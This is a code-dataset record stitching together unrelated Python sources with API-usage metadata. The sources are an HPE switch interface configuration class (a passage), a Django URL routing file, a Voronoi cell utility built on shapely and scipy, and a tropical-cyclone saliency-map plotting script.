        if not self.is_ethernet:
            # speed/duplex only make sense on physical ethernet ports
            param_names = []
            if params.get('speed'):
                param_names.append('speed')
            if params.get('duplex'):
                param_names.append('duplex')
            if param_names:
                raise InterfaceParamsError(self.interface_name, param_names)
        if self.iface_type == 'Vlan-interface':
            number = self.interface_name.split('Vlan-interface')[1]
            vlan = Vlan(self.device, number)
            if not vlan.get_config():
                raise InterfaceVlanMustExist(self.interface_name, number)
    def get_config(self):
        """Return the currently configured
        parameters for the interface.

        Returns:
            A dictionary of currently configured
            parameters for the interface, including:

            :admin (str): The up/down state of the interface.
                'up' or 'down'.
            :speed (str): The speed of the interface, in Mbps.
            :duplex (str): The duplex of the interface.
                'full', 'half', or 'auto'.
            :description (str): The textual description of the interface.
            :type (str): Whether the interface is in layer 2 or
                layer 3 mode. 'bridged' or 'routed'.
        """
        E = data_element_maker()
        top = E.top(
            E.Ifmgr(
                E.Interfaces(
                    E.Interface(
                        E.IfIndex(self.iface_index)
                    )
                )
            )
        )
        nc_get_reply = self.device.get(('subtree', top))
        reply_data = find_in_data(self._iface_row_name, nc_get_reply.data_ele)
        if reply_data is None:
            return {}
        return data_elem_to_dict(reply_data, self._key_map, value_map=self._value_map)
    def create_logical(self, stage=False):
        """Stage or execute the configuration to create
        a logical interface.

        Supported types include 'LoopBack',
        'Vlan-interface', 'Bridge-Aggregation',
        and 'Route-Aggregation'

        Args:
            stage (bool): whether to stage the commands or execute
                immediately

        Note:
            When stage=True, it's the caller's responsibility to call
            ``execute()`` on this class's ``device``
            object after this method is called.

        Note:
            After execution, the caller must call ``update()`` on this class.

        Returns:
            True if successful.

        Raises:
            InterfaceCreateError: if the logical interface
                cannot be created.
        """
        return self._logical_iface(stage=stage)
    def remove_logical(self, stage=False):
        """Stage or execute the configuration to remove
        a logical interface.

        Supported types include 'LoopBack',
        'Vlan-interface', 'Bridge-Aggregation',
        and 'Route-Aggregation'

        Args:
            stage (bool): whether to stage the commands or execute
                immediately

        Note:
            It's the caller's responsibility to call
            ``execute()`` on this class's ``device``
            object after this method is called.

        Returns:
            True if stage=True and staging is successful
            etree.Element XML response if immediate execution

        Raises:
            InterfaceCreateError: if the logical interface
                cannot be removed.
        """
        return self._logical_iface(remove=True, stage=stage)
    def _logical_iface(self, remove=False, stage=False):
        """Stage or execute the configuration to create
        or remove a logical interface.

        Args:
            remove (bool): If ``True``, the logical
                interface is removed. If ``False``,
                the logical interface is created.
            stage (bool): whether to stage the commands or execute
                immediately

        Returns:
            True if stage=True and staging is successful
            etree.Element XML response if immediate execution
        """
        # IfTypeExt values the device expects for each logical type
        logic_type_map = {'LoopBack': '16',
                          'Vlan-interface': '41',
                          'Bridge-Aggregation': '56',
                          'Route-Aggregation': '67'}
        if self.iface_type not in logic_type_map:
            raise InterfaceCreateError(self.interface_name)
        iface_number = self.interface_name.split(self.iface_type)[1]
        E = action_element_maker()
        top = E.top(
            E.Ifmgr(
                E.LogicInterfaces(
                    E.Interface(
                        E.IfTypeExt(logic_type_map[self.iface_type]),
                        E.Number(iface_number)
                    )
                )
            )
        )
        if remove:
            find_in_action('Interface', top).append(E.Remove())
        if stage:
            return self.device.stage_config(top, 'action')
        else:
            return self.device.action(top)
    def build(self, stage=False, **params):
        """Stage or execute the configuration to
        modify an interface.

        Args:
            stage (bool): whether to stage the commands or execute
                immediately
            **params: see Keyword Args.

        Keyword Args:
            admin (str): The up/down state of the interface.
                'up' or 'down'.
            speed (str): The speed of the interface, in Mbps.
            duplex (str): The duplex of the interface.
                'full', 'half', or 'auto'.
            description (str): The textual description of the interface.
            type (str): Whether the interface is in layer 2 or layer 3 mode.
                'bridged' or 'routed'.

        Raises:
            InterfaceCreateError: if a logical interface cannot be created.

        Returns:
            True if stage=True and staging is successful
            etree.Element XML response if immediate execution
        """
        return self._build_config(state='present', stage=stage, **params)
    def default(self, stage=False):
        """Stage or execute the configuration to default an interface.

        stage (bool): whether to stage the commands or execute
            immediately

        Returns:
            True if stage=True and staging is successful
            etree.Element XML response if immediate execution
        """
        return self._build_config(state='default', stage=stage)
    def _build_config(self, state, stage=False, **params):
        """Stage or execute the configuration to
        configure, default, or remove an interface.

        Args:
            state (str): 'present' configures,
                'absent' defaults,
                'default' defaults.
            stage (bool): whether to stage the commands or execute
                immediately
            **params: Used when state=present, see Keyword Args.

        Keyword Args:
            admin (str): The up/down state of the interface.
                'up' or 'down'.
            speed (str): The speed of the interface, in Mbps.
            duplex (str): The duplex of the interface.
                'full', 'half', or 'auto'.
            description (str): The textual description of the interface.
            type (str): Whether the interface is in layer 2 or layer 3 mode.
                'bridged' or 'routed'.

        Returns:
            True if stage=True and staging is successful
            etree.Element XML response if immediate execution
            False if illegal operation, e.g. removing a physical interface
        """
        if state == 'default':
            if self.iface_exists:
                E = action_element_maker()
                top = E.top(
                    E.Ifmgr(
                        E.Interfaces(
                            E.Interface(
                                E.IfIndex(self.iface_index),
                                E.Default()
                            )
                        )
                    )
                )
                if stage:
                    return self.device.stage_config(top, 'action')
                else:
                    return self.device.action(top)
        if state == 'present':
            params[self._iface_index_name] = self.iface_index
            EN = nc_element_maker()
            EC = config_element_maker()
            config = EN.config(
                EC.top(
                    EC.Ifmgr(
                        EC.Interfaces(
                            EC.Interface(
                                *config_params(params, self._key_map, value_map=self._r_value_map)
                            )
                        )
                    )
                )
            )
            if stage:
                return self.device.stage_config(config, 'edit_config')
            else:
                return self.device.edit_config(config)
        if state == 'absent':
            # physical interfaces cannot be removed, only defaulted
            if self.is_ethernet:
                return self._build_config('default', stage=stage)
            return False
| [
"pyhpecw7.utils.xml.lib.reverse_value_map",
"pyhpecw7.features.errors.InterfaceParamsError",
"pyhpecw7.features.errors.InterfaceVlanMustExist",
"pyhpecw7.features.errors.InterfaceCreateError",
"pyhpecw7.features.errors.InterfaceAbsentError",
"pyhpecw7.features.vlan.Vlan"
] | [((2982, 3033), 'pyhpecw7.utils.xml.lib.reverse_value_map', 'reverse_value_map', (['self._r_key_map', 'self._value_map'], {}), '(self._r_key_map, self._value_map)\n', (2999, 3033), False, 'from pyhpecw7.utils.xml.lib import reverse_value_map\n'), ((7232, 7273), 'pyhpecw7.features.errors.InterfaceCreateError', 'InterfaceCreateError', (['self.interface_name'], {}), '(self.interface_name)\n', (7252, 7273), False, 'from pyhpecw7.features.errors import InterfaceCreateError, InterfaceTypeError, InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist\n'), ((10325, 10350), 'pyhpecw7.features.vlan.Vlan', 'Vlan', (['self.device', 'number'], {}), '(self.device, number)\n', (10329, 10350), False, 'from pyhpecw7.features.vlan import Vlan\n'), ((14160, 14201), 'pyhpecw7.features.errors.InterfaceCreateError', 'InterfaceCreateError', (['self.interface_name'], {}), '(self.interface_name)\n', (14180, 14201), False, 'from pyhpecw7.features.errors import InterfaceCreateError, InterfaceTypeError, InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist\n'), ((9817, 9858), 'pyhpecw7.features.errors.InterfaceAbsentError', 'InterfaceAbsentError', (['self.interface_name'], {}), '(self.interface_name)\n', (9837, 9858), False, 'from pyhpecw7.features.errors import InterfaceCreateError, InterfaceTypeError, InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist\n'), ((10134, 10188), 'pyhpecw7.features.errors.InterfaceParamsError', 'InterfaceParamsError', (['self.interface_name', 'param_names'], {}), '(self.interface_name, param_names)\n', (10154, 10188), False, 'from pyhpecw7.features.errors import InterfaceCreateError, InterfaceTypeError, InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist\n'), ((10411, 10462), 'pyhpecw7.features.errors.InterfaceVlanMustExist', 'InterfaceVlanMustExist', (['self.interface_name', 'number'], {}), '(self.interface_name, number)\n', (10433, 10462), False, 'from pyhpecw7.features.errors import 
InterfaceCreateError, InterfaceTypeError, InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist\n')] |
from django.contrib import admin
from django.urls import path, include
from src.base import urls as base_api
# Route table for the project: the Django admin site, plus the REST API
# endpoints defined in ``src.base.urls`` mounted under ``rest_api/``.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('rest_api/', include(base_api.urlpatterns)),
]
] | [
"django.urls.path",
"django.urls.include"
] | [((131, 162), 'django.urls.path', 'path', (['"""admin/"""', 'admin.site.urls'], {}), "('admin/', admin.site.urls)\n", (135, 162), False, 'from django.urls import path, include\n'), ((186, 215), 'django.urls.include', 'include', (['base_api.urlpatterns'], {}), '(base_api.urlpatterns)\n', (193, 215), False, 'from django.urls import path, include\n')] |
"""Compute ordinary Voronoi diagrams in Shapely geometries."""
import operator
import numpy
import scipy.spatial
import shapely.geometry
import shapely.geometry.base
import shapely.prepared
def pointset_bounds(coords):
    """Return the axis-aligned bounding box of a point set as the tuple
    (minx, miny, maxx, maxy)."""
    xs = [pt[0] for pt in coords]
    ys = [pt[1] for pt in coords]
    return (min(xs), min(ys), max(xs), max(ys))
def bounds_to_limiting_generators(minx, miny, maxx, maxy):
    """Return four artificial generator points placed one bounding-box
    width/height outside each corner of the given bounds.  These force
    the Voronoi cells of the real points to stay bounded."""
    pad_x = maxx - minx
    pad_y = maxy - miny
    left, right = minx - pad_x, maxx + pad_x
    bottom, top = miny - pad_y, maxy + pad_y
    return [
        (left, bottom),
        (right, bottom),
        (left, top),
        (right, top),
    ]
def cells(points, extent=None):
    """Yield one Voronoi cell polygon per input point.

    When *extent* is given (as a shapely geometry or a bounds 4-tuple),
    cells not fully contained in it are clipped to it; otherwise cells
    are yielded as-is and the point set's own bounds are used to place
    the limiting generators.
    """
    if extent is not None:
        if not isinstance(extent, shapely.geometry.base.BaseGeometry):
            extent = shapely.geometry.box(*extent)
        bounding_box = extent.bounds
        prepared_extent = shapely.prepared.prep(extent)
    else:
        bounding_box = pointset_bounds(points)
        prepared_extent = None
    limit_gens = bounds_to_limiting_generators(*bounding_box)
    voronoi = scipy.spatial.Voronoi(numpy.concatenate((points, limit_gens)))
    # The trailing entries of point_region belong to the artificial
    # limiting generators; only the real points' regions are yielded.
    for region_index in voronoi.point_region[:-len(limit_gens)]:
        cell = shapely.geometry.Polygon(
            voronoi.vertices[voronoi.regions[region_index]])
        if prepared_extent is None or prepared_extent.contains(cell):
            yield cell
        else:
            yield extent.intersection(cell)
def cells_shapely(points, extent=None):
    """Like :func:`cells`, but *points* are shapely point geometries
    rather than raw coordinate pairs."""
    coord_array = numpy.array([pt.coords[0] for pt in points])
    return cells(coord_array, extent=extent)
"numpy.array",
"operator.itemgetter",
"numpy.concatenate"
] | [((1145, 1183), 'numpy.concatenate', 'numpy.concatenate', (['(points, boundgens)'], {}), '((points, boundgens))\n', (1162, 1183), False, 'import numpy\n'), ((1550, 1594), 'numpy.array', 'numpy.array', (['[pt.coords[0] for pt in points]'], {}), '([pt.coords[0] for pt in points])\n', (1561, 1594), False, 'import numpy\n'), ((260, 282), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (279, 282), False, 'import operator\n'), ((312, 334), 'operator.itemgetter', 'operator.itemgetter', (['(1)'], {}), '(1)\n', (331, 334), False, 'import operator\n'), ((364, 386), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (383, 386), False, 'import operator\n'), ((416, 438), 'operator.itemgetter', 'operator.itemgetter', (['(1)'], {}), '(1)\n', (435, 438), False, 'import operator\n')] |
"""Plots composite saliency map."""
import argparse
import numpy
import matplotlib
matplotlib.use('agg')
from matplotlib import pyplot
from gewittergefahr.gg_utils import general_utils as gg_general_utils
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.plotting import imagemagick_utils
from ml4tc.utils import normalization
from ml4tc.machine_learning import saliency
from ml4tc.machine_learning import neural_net
from ml4tc.plotting import plotting_utils
from ml4tc.plotting import satellite_plotting
from ml4tc.plotting import predictor_plotting
MAX_COLOUR_PERCENTILE = 99.
SHIPS_BUILTIN_LAG_TIMES_HOURS = numpy.array([numpy.nan, 0, 1.5, 3])
COLOUR_BAR_FONT_SIZE = 12
SCALAR_SATELLITE_FONT_SIZE = 20
LAGGED_SHIPS_FONT_SIZE = 20
FORECAST_SHIPS_FONT_SIZE = 10
FIGURE_RESOLUTION_DPI = 300
PANEL_SIZE_PX = int(2.5e6)
SALIENCY_FILE_ARG_NAME = 'input_saliency_file_name'
NORMALIZATION_FILE_ARG_NAME = 'input_normalization_file_name'
PLOT_INPUT_GRAD_ARG_NAME = 'plot_input_times_grad'
SPATIAL_COLOUR_MAP_ARG_NAME = 'spatial_colour_map_name'
NONSPATIAL_COLOUR_MAP_ARG_NAME = 'nonspatial_colour_map_name'
SMOOTHING_RADIUS_ARG_NAME = 'smoothing_radius_px'
OUTPUT_DIR_ARG_NAME = 'output_dir_name'
SALIENCY_FILE_HELP_STRING = (
'Path to saliency file. Will be read by `saliency.read_composite_file`.'
)
NORMALIZATION_FILE_HELP_STRING = (
'Path to file with normalization params (will be used to denormalize '
'brightness-temperature maps before plotting). Will be read by '
'`normalization.read_file`.'
)
PLOT_INPUT_GRAD_HELP_STRING = (
'Boolean flag. If 1 (0), will plot input * gradient (saliency).'
)
SPATIAL_COLOUR_MAP_HELP_STRING = (
'Name of colour scheme for spatial saliency maps. Must be accepted by '
'`matplotlib.pyplot.get_cmap`.'
)
NONSPATIAL_COLOUR_MAP_HELP_STRING = (
'Name of colour scheme for non-spatial saliency maps. Must be accepted by '
'`matplotlib.pyplot.get_cmap`.'
)
SMOOTHING_RADIUS_HELP_STRING = (
'Smoothing radius (number of pixels) for saliency maps. If you do not want'
' to smooth, make this 0 or negative.'
)
OUTPUT_DIR_HELP_STRING = 'Name of output directory. Images will be saved here.'
INPUT_ARG_PARSER = argparse.ArgumentParser()
INPUT_ARG_PARSER.add_argument(
'--' + SALIENCY_FILE_ARG_NAME, type=str, required=True,
help=SALIENCY_FILE_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + NORMALIZATION_FILE_ARG_NAME, type=str, required=True,
help=NORMALIZATION_FILE_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + PLOT_INPUT_GRAD_ARG_NAME, type=int, required=True,
help=PLOT_INPUT_GRAD_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + SPATIAL_COLOUR_MAP_ARG_NAME, type=str, required=False,
default='BuGn', help=SPATIAL_COLOUR_MAP_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + NONSPATIAL_COLOUR_MAP_ARG_NAME, type=str, required=False,
default='binary', help=NONSPATIAL_COLOUR_MAP_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + SMOOTHING_RADIUS_ARG_NAME, type=float, required=False, default=-1,
help=SMOOTHING_RADIUS_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + OUTPUT_DIR_ARG_NAME, type=str, required=True,
help=OUTPUT_DIR_HELP_STRING
)
def _plot_brightness_temp_saliency(
        saliency_dict, model_metadata_dict, normalization_table_xarray,
        colour_map_object, plot_input_times_grad, output_dir_name):
    """Plots saliency for brightness temp for each lag time at one init time.

    :param saliency_dict: See doc for `_plot_scalar_satellite_saliency`.
    :param model_metadata_dict: Same.
    :param normalization_table_xarray: xarray table returned by
        `normalization.read_file`.
    :param colour_map_object: See doc for `_plot_scalar_satellite_saliency`.
    :param plot_input_times_grad: Same.
    :param output_dir_name: Same.
    """
    # Add a leading example axis of length 1 to each predictor matrix
    # (missing predictor groups stay None).
    predictor_matrices = [
        None if p is None else numpy.expand_dims(p, axis=0)
        for p in saliency_dict[saliency.THREE_PREDICTORS_KEY]
    ]
    # Select either raw saliency or input-times-gradient fields.
    if plot_input_times_grad:
        this_key = saliency.THREE_INPUT_GRAD_KEY
    else:
        this_key = saliency.THREE_SALIENCY_KEY
    saliency_matrices = [
        None if p is None else numpy.expand_dims(p, axis=0)
        for p in saliency_dict[this_key]
    ]
    num_lag_times = predictor_matrices[0].shape[3]
    # Placeholder lat/long grids and cyclone ID for the composite;
    # presumably only used for axis labelling -- TODO confirm against
    # predictor_plotting.plot_brightness_temp_one_example.
    grid_latitudes_deg_n = numpy.linspace(
        -10, 10, num=predictor_matrices[0].shape[1], dtype=float
    )
    grid_latitude_matrix_deg_n = numpy.expand_dims(grid_latitudes_deg_n, axis=1)
    grid_latitude_matrix_deg_n = numpy.repeat(
        grid_latitude_matrix_deg_n, axis=1, repeats=num_lag_times
    )
    grid_longitudes_deg_e = numpy.linspace(
        300, 320, num=predictor_matrices[0].shape[2], dtype=float
    )
    grid_longitude_matrix_deg_e = numpy.expand_dims(
        grid_longitudes_deg_e, axis=1
    )
    grid_longitude_matrix_deg_e = numpy.repeat(
        grid_longitude_matrix_deg_e, axis=1, repeats=num_lag_times
    )
    # One figure/axes per model lag time, with denormalized brightness
    # temperatures as the background field.
    figure_objects, axes_objects, pathless_output_file_names = (
        predictor_plotting.plot_brightness_temp_one_example(
            predictor_matrices_one_example=predictor_matrices,
            model_metadata_dict=model_metadata_dict,
            cyclone_id_string='2005AL12', init_time_unix_sec=0,
            grid_latitude_matrix_deg_n=grid_latitude_matrix_deg_n,
            grid_longitude_matrix_deg_e=grid_longitude_matrix_deg_e,
            normalization_table_xarray=normalization_table_xarray,
            border_latitudes_deg_n=numpy.array([20.]),
            border_longitudes_deg_e=numpy.array([330.])
        )
    )
    validation_option_dict = (
        model_metadata_dict[neural_net.VALIDATION_OPTIONS_KEY]
    )
    num_model_lag_times = len(
        validation_option_dict[neural_net.SATELLITE_LAG_TIMES_KEY]
    )
    # Contour limits are shared across all panels, taken from the
    # MAX_COLOUR_PERCENTILE range of all absolute saliency values.
    all_saliency_values = numpy.concatenate([
        numpy.ravel(s) for s in saliency_matrices if s is not None
    ])
    min_abs_contour_value = numpy.percentile(
        numpy.absolute(all_saliency_values), 100. - MAX_COLOUR_PERCENTILE
    )
    max_abs_contour_value = numpy.percentile(
        numpy.absolute(all_saliency_values), MAX_COLOUR_PERCENTILE
    )
    panel_file_names = [''] * num_model_lag_times
    for k in range(num_model_lag_times):
        # plot_saliency returns the (possibly adjusted) contour limits,
        # which are fed back in so all panels stay consistent.
        min_abs_contour_value, max_abs_contour_value = (
            satellite_plotting.plot_saliency(
                saliency_matrix=saliency_matrices[0][0, ..., k, 0],
                axes_object=axes_objects[k],
                latitude_array_deg_n=grid_latitude_matrix_deg_n[:, k],
                longitude_array_deg_e=grid_longitude_matrix_deg_e[:, k],
                min_abs_contour_value=min_abs_contour_value,
                max_abs_contour_value=max_abs_contour_value,
                half_num_contours=10,
                colour_map_object=colour_map_object
            )
        )
        panel_file_names[k] = '{0:s}/{1:s}'.format(
            output_dir_name, pathless_output_file_names[k]
        )
        print('Saving figure to file: "{0:s}"...'.format(
            panel_file_names[k]
        ))
        figure_objects[k].savefig(
            panel_file_names[k], dpi=FIGURE_RESOLUTION_DPI,
            pad_inches=0, bbox_inches='tight'
        )
        pyplot.close(figure_objects[k])
        imagemagick_utils.resize_image(
            input_file_name=panel_file_names[k],
            output_file_name=panel_file_names[k],
            output_size_pixels=PANEL_SIZE_PX
        )
    # Stitch the per-lag-time panels into one figure and attach two
    # colour bars: brightness temperature and saliency magnitude.
    concat_figure_file_name = '{0:s}/brightness_temp_concat.jpg'.format(
        output_dir_name
    )
    plotting_utils.concat_panels(
        panel_file_names=panel_file_names,
        concat_figure_file_name=concat_figure_file_name
    )
    this_cmap_object, this_cnorm_object = (
        satellite_plotting.get_colour_scheme()
    )
    plotting_utils.add_colour_bar(
        figure_file_name=concat_figure_file_name,
        colour_map_object=this_cmap_object,
        colour_norm_object=this_cnorm_object,
        orientation_string='vertical', font_size=COLOUR_BAR_FONT_SIZE,
        cbar_label_string='Brightness temp (K)',
        tick_label_format_string='{0:d}'
    )
    colour_norm_object = pyplot.Normalize(
        vmin=min_abs_contour_value, vmax=max_abs_contour_value
    )
    label_string = 'Absolute {0:s}'.format(
        'input times gradient' if plot_input_times_grad else 'saliency'
    )
    plotting_utils.add_colour_bar(
        figure_file_name=concat_figure_file_name,
        colour_map_object=colour_map_object,
        colour_norm_object=colour_norm_object,
        orientation_string='vertical', font_size=COLOUR_BAR_FONT_SIZE,
        cbar_label_string=label_string, tick_label_format_string='{0:.2g}'
    )
def _run(saliency_file_name, normalization_file_name, plot_input_times_grad,
         spatial_colour_map_name, nonspatial_colour_map_name,
         smoothing_radius_px, output_dir_name):
    """Plots composite saliency map.

    This is effectively the main method.

    :param saliency_file_name: See documentation at top of file.
    :param normalization_file_name: Same.
    :param plot_input_times_grad: Same.
    :param spatial_colour_map_name: Same.
    :param nonspatial_colour_map_name: Same.
    :param smoothing_radius_px: Same.
    :param output_dir_name: Same.
    """
    spatial_colour_map_object = pyplot.get_cmap(spatial_colour_map_name)
    # NOTE(review): parsed but never used below (only the spatial colour
    # map is passed on) -- confirm whether non-spatial plots were meant
    # to be produced by this script.
    nonspatial_colour_map_object = pyplot.get_cmap(nonspatial_colour_map_name)
    file_system_utils.mkdir_recursive_if_necessary(
        directory_name=output_dir_name
    )
    # Read files.
    print('Reading data from: "{0:s}"...'.format(saliency_file_name))
    saliency_dict = saliency.read_composite_file(saliency_file_name)
    if plot_input_times_grad:
        this_key = saliency.THREE_INPUT_GRAD_KEY
    else:
        this_key = saliency.THREE_SALIENCY_KEY
    # Optionally smooth the gridded (brightness-temperature) saliency
    # fields; the first element of the list holds the gridded fields.
    if smoothing_radius_px > 0 and saliency_dict[this_key][0] is not None:
        print((
            'Smoothing maps with Gaussian filter (e-folding radius of {0:.1f} '
            'pixels)...'
        ).format(smoothing_radius_px))
        num_lag_times = saliency_dict[this_key][0].shape[-2]
        for k in range(num_lag_times):
            saliency_dict[this_key][0][..., k, 0] = (
                gg_general_utils.apply_gaussian_filter(
                    input_matrix=saliency_dict[this_key][0][..., k, 0],
                    e_folding_radius_grid_cells=smoothing_radius_px
                )
            )
    model_file_name = saliency_dict[saliency.MODEL_FILE_KEY]
    model_metafile_name = neural_net.find_metafile(
        model_file_name=model_file_name, raise_error_if_missing=True
    )
    print('Reading metadata from: "{0:s}"...'.format(model_metafile_name))
    model_metadata_dict = neural_net.read_metafile(model_metafile_name)
    print('Reading data from: "{0:s}"...'.format(normalization_file_name))
    normalization_table_xarray = normalization.read_file(
        normalization_file_name
    )
    # Plot saliency map.
    _plot_brightness_temp_saliency(
        saliency_dict=saliency_dict, model_metadata_dict=model_metadata_dict,
        normalization_table_xarray=normalization_table_xarray,
        colour_map_object=spatial_colour_map_object,
        plot_input_times_grad=plot_input_times_grad,
        output_dir_name=output_dir_name
    )
# Script entry point: parse command-line args and hand them to _run.
if __name__ == '__main__':
    INPUT_ARG_OBJECT = INPUT_ARG_PARSER.parse_args()
    _run(
        saliency_file_name=getattr(INPUT_ARG_OBJECT, SALIENCY_FILE_ARG_NAME),
        normalization_file_name=getattr(
            INPUT_ARG_OBJECT, NORMALIZATION_FILE_ARG_NAME
        ),
        plot_input_times_grad=bool(getattr(
            INPUT_ARG_OBJECT, PLOT_INPUT_GRAD_ARG_NAME
        )),
        spatial_colour_map_name=getattr(
            INPUT_ARG_OBJECT, SPATIAL_COLOUR_MAP_ARG_NAME
        ),
        nonspatial_colour_map_name=getattr(
            INPUT_ARG_OBJECT, NONSPATIAL_COLOUR_MAP_ARG_NAME
        ),
        smoothing_radius_px=getattr(
            INPUT_ARG_OBJECT, SMOOTHING_RADIUS_ARG_NAME
        ),
        output_dir_name=getattr(INPUT_ARG_OBJECT, OUTPUT_DIR_ARG_NAME)
    )
| [
"ml4tc.plotting.plotting_utils.concat_panels",
"numpy.array",
"numpy.ravel",
"gewittergefahr.gg_utils.general_utils.apply_gaussian_filter",
"numpy.repeat",
"argparse.ArgumentParser",
"matplotlib.pyplot.Normalize",
"matplotlib.pyplot.close",
"numpy.linspace",
"ml4tc.machine_learning.neural_net.find... | [((84, 105), 'matplotlib.use', 'matplotlib.use', (['"""agg"""'], {}), "('agg')\n", (98, 105), False, 'import matplotlib\n'), ((637, 672), 'numpy.array', 'numpy.array', (['[numpy.nan, 0, 1.5, 3]'], {}), '([numpy.nan, 0, 1.5, 3])\n', (648, 672), False, 'import numpy\n'), ((2217, 2242), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2240, 2242), False, 'import argparse\n'), ((4362, 4434), 'numpy.linspace', 'numpy.linspace', (['(-10)', '(10)'], {'num': 'predictor_matrices[0].shape[1]', 'dtype': 'float'}), '(-10, 10, num=predictor_matrices[0].shape[1], dtype=float)\n', (4376, 4434), False, 'import numpy\n'), ((4482, 4529), 'numpy.expand_dims', 'numpy.expand_dims', (['grid_latitudes_deg_n'], {'axis': '(1)'}), '(grid_latitudes_deg_n, axis=1)\n', (4499, 4529), False, 'import numpy\n'), ((4563, 4634), 'numpy.repeat', 'numpy.repeat', (['grid_latitude_matrix_deg_n'], {'axis': '(1)', 'repeats': 'num_lag_times'}), '(grid_latitude_matrix_deg_n, axis=1, repeats=num_lag_times)\n', (4575, 4634), False, 'import numpy\n'), ((4678, 4751), 'numpy.linspace', 'numpy.linspace', (['(300)', '(320)'], {'num': 'predictor_matrices[0].shape[2]', 'dtype': 'float'}), '(300, 320, num=predictor_matrices[0].shape[2], dtype=float)\n', (4692, 4751), False, 'import numpy\n'), ((4800, 4848), 'numpy.expand_dims', 'numpy.expand_dims', (['grid_longitudes_deg_e'], {'axis': '(1)'}), '(grid_longitudes_deg_e, axis=1)\n', (4817, 4848), False, 'import numpy\n'), ((4897, 4969), 'numpy.repeat', 'numpy.repeat', (['grid_longitude_matrix_deg_e'], {'axis': '(1)', 'repeats': 'num_lag_times'}), '(grid_longitude_matrix_deg_e, axis=1, repeats=num_lag_times)\n', (4909, 4969), False, 'import numpy\n'), ((7598, 7714), 'ml4tc.plotting.plotting_utils.concat_panels', 'plotting_utils.concat_panels', ([], {'panel_file_names': 'panel_file_names', 'concat_figure_file_name': 'concat_figure_file_name'}), '(panel_file_names=panel_file_names,\n 
concat_figure_file_name=concat_figure_file_name)\n', (7626, 7714), False, 'from ml4tc.plotting import plotting_utils\n'), ((7786, 7824), 'ml4tc.plotting.satellite_plotting.get_colour_scheme', 'satellite_plotting.get_colour_scheme', ([], {}), '()\n', (7822, 7824), False, 'from ml4tc.plotting import satellite_plotting\n'), ((7835, 8136), 'ml4tc.plotting.plotting_utils.add_colour_bar', 'plotting_utils.add_colour_bar', ([], {'figure_file_name': 'concat_figure_file_name', 'colour_map_object': 'this_cmap_object', 'colour_norm_object': 'this_cnorm_object', 'orientation_string': '"""vertical"""', 'font_size': 'COLOUR_BAR_FONT_SIZE', 'cbar_label_string': '"""Brightness temp (K)"""', 'tick_label_format_string': '"""{0:d}"""'}), "(figure_file_name=concat_figure_file_name,\n colour_map_object=this_cmap_object, colour_norm_object=\n this_cnorm_object, orientation_string='vertical', font_size=\n COLOUR_BAR_FONT_SIZE, cbar_label_string='Brightness temp (K)',\n tick_label_format_string='{0:d}')\n", (7864, 8136), False, 'from ml4tc.plotting import plotting_utils\n'), ((8199, 8271), 'matplotlib.pyplot.Normalize', 'pyplot.Normalize', ([], {'vmin': 'min_abs_contour_value', 'vmax': 'max_abs_contour_value'}), '(vmin=min_abs_contour_value, vmax=max_abs_contour_value)\n', (8215, 8271), False, 'from matplotlib import pyplot\n'), ((8412, 8708), 'ml4tc.plotting.plotting_utils.add_colour_bar', 'plotting_utils.add_colour_bar', ([], {'figure_file_name': 'concat_figure_file_name', 'colour_map_object': 'colour_map_object', 'colour_norm_object': 'colour_norm_object', 'orientation_string': '"""vertical"""', 'font_size': 'COLOUR_BAR_FONT_SIZE', 'cbar_label_string': 'label_string', 'tick_label_format_string': '"""{0:.2g}"""'}), "(figure_file_name=concat_figure_file_name,\n colour_map_object=colour_map_object, colour_norm_object=\n colour_norm_object, orientation_string='vertical', font_size=\n COLOUR_BAR_FONT_SIZE, cbar_label_string=label_string,\n tick_label_format_string='{0:.2g}')\n", (8441, 
8708), False, 'from ml4tc.plotting import plotting_utils\n'), ((9353, 9393), 'matplotlib.pyplot.get_cmap', 'pyplot.get_cmap', (['spatial_colour_map_name'], {}), '(spatial_colour_map_name)\n', (9368, 9393), False, 'from matplotlib import pyplot\n'), ((9429, 9472), 'matplotlib.pyplot.get_cmap', 'pyplot.get_cmap', (['nonspatial_colour_map_name'], {}), '(nonspatial_colour_map_name)\n', (9444, 9472), False, 'from matplotlib import pyplot\n'), ((9477, 9555), 'gewittergefahr.gg_utils.file_system_utils.mkdir_recursive_if_necessary', 'file_system_utils.mkdir_recursive_if_necessary', ([], {'directory_name': 'output_dir_name'}), '(directory_name=output_dir_name)\n', (9523, 9555), False, 'from gewittergefahr.gg_utils import file_system_utils\n'), ((9679, 9727), 'ml4tc.machine_learning.saliency.read_composite_file', 'saliency.read_composite_file', (['saliency_file_name'], {}), '(saliency_file_name)\n', (9707, 9727), False, 'from ml4tc.machine_learning import saliency\n'), ((10573, 10663), 'ml4tc.machine_learning.neural_net.find_metafile', 'neural_net.find_metafile', ([], {'model_file_name': 'model_file_name', 'raise_error_if_missing': '(True)'}), '(model_file_name=model_file_name,\n raise_error_if_missing=True)\n', (10597, 10663), False, 'from ml4tc.machine_learning import neural_net\n'), ((10775, 10820), 'ml4tc.machine_learning.neural_net.read_metafile', 'neural_net.read_metafile', (['model_metafile_name'], {}), '(model_metafile_name)\n', (10799, 10820), False, 'from ml4tc.machine_learning import neural_net\n'), ((10930, 10978), 'ml4tc.utils.normalization.read_file', 'normalization.read_file', (['normalization_file_name'], {}), '(normalization_file_name)\n', (10953, 10978), False, 'from ml4tc.utils import normalization\n'), ((6001, 6036), 'numpy.absolute', 'numpy.absolute', (['all_saliency_values'], {}), '(all_saliency_values)\n', (6015, 6036), False, 'import numpy\n'), ((6127, 6162), 